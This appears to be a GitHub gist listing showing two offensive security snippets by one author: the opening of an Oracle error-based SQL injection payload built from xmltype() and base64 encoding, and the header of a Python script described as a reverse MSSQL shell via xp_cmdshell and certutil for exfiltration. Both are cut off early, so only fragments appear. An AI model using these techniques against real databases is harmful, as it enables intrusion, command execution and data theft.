Skip to content

Instantly share code, notes, and snippets.

Avatar

Pablo xassiz

View GitHub Profile
@xassiz
xassiz / oracle_error-based_xmltype.sql
Created Apr 17, 2018
Optimized Oracle error-based SQL injection technique via xmltype() + base64
View oracle_error-based_xmltype.sql
/*
* @description: Optimized Oracle error-based SQLi via xmltype() + base64 (up to 162 bytes/req)
* @author: xassiz
*/
select ''||
xmltype('<'||
regexp_replace(
utl_raw.cast_to_varchar2(
utl_encode.base64_encode(
@xassiz
xassiz / mandros.py
Created Mar 16, 2018
Reverse MSSQL shell
View mandros.py
import sys
import requests
import threading
import HTMLParser
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
'''
Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration
Author: @xassiz
'''